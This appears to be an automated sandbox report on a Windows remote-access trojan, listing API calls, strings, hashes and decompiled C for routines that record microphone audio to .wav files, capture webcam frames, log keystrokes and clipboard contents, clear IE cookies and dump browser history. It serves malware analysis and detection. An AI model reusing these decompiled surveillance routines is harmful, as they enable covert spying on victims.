                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004013BE, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 154fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E004013BE(long _a4, void** _a8) {
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				signed int _t37;
				signed int _t41;
				void* _t82;
				signed int _t83;
				signed int _t89;

				_t83 = E0041B21A & 0x0000ffff;
				_t37 = (E0041B226 & 0x0000ffff) * _t83;
				_v20 = _t37 * E0041B21C >> 3;
				asm("cdq");
				_t89 = 8;
				_v16 = 1;
				_v12 = 0x10;
				_v24 = _t37 / _t89;
				_t41 = _a8[1] * _t83;
				_v28 = _t41;
				_v8 = _t41 + 0x24;
				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t82 != 0xffffffff) {
					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
					WriteFile(_t82,  &E0041B21A, 2,  &_a4, 0);
					WriteFile(_t82,  &E0041B21C, 4,  &_a4, 0);
					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
					WriteFile(_t82,  &E0041B226, 2,  &_a4, 0);
					WriteFile(_t82, "data", 4,  &_a4, 0);
					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
					CloseHandle(_t82);
					return 1;
				}
				return 0;
			}














                                  0x004013c4
                                  0x004013d2
                                  0x004013e4
                                  0x004013e9
                                  0x004013ea
                                  0x00401401
                                  0x00401408
                                  0x0040140f
                                  0x00401418
                                  0x0040141b
                                  0x00401421
                                  0x0040142a
                                  0x0040142f
                                  0x0040144b
                                  0x00401459
                                  0x00401468
                                  0x00401477
                                  0x00401485
                                  0x00401493
                                  0x004014a2
                                  0x004014b1
                                  0x004014bf
                                  0x004014cd
                                  0x004014dc
                                  0x004014eb
                                  0x004014f9
                                  0x00401509
                                  0x0040150c
                                  0x00000000
                                  0x00401512
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                  • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                  • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                  • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                  • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                  • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                  • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B26, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 105sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(000000FA), ref: 00401C24
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                  Strings
                                  • /sort "Visit Time" /stext ", xrefs: 00401B97
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                  • String ID: /sort "Visit Time" /stext "
                                  • API String ID: 1247708949-1573945896
                                  • Opcode ID: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                  • Opcode Fuzzy Hash: bae4231b7ad8b89fc812ac0498ce92f67c75d04b095d5612855b5cb53df7ea03
                                  • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                  • toupper.MSVCRT ref: 0040698A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                  • toupper.MSVCRT ref: 00406A61
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                  • tolower.MSVCRT ref: 00406A3A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                  Strings
                                  • [End of clipboard text], xrefs: 004069EC
                                  • [Ctrl + , xrefs: 00406996
                                  • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                  • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                  • API String ID: 1567161615-398269065
                                  • Opcode ID: 7bcb2ca4d05078fcc67478024d11bb5d070264c80da8943c36bc5bf97b2b720a
                                  • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                  • Opcode Fuzzy Hash: 7bcb2ca4d05078fcc67478024d11bb5d070264c80da8943c36bc5bf97b2b720a
                                  • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407767, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                  • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CCF, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
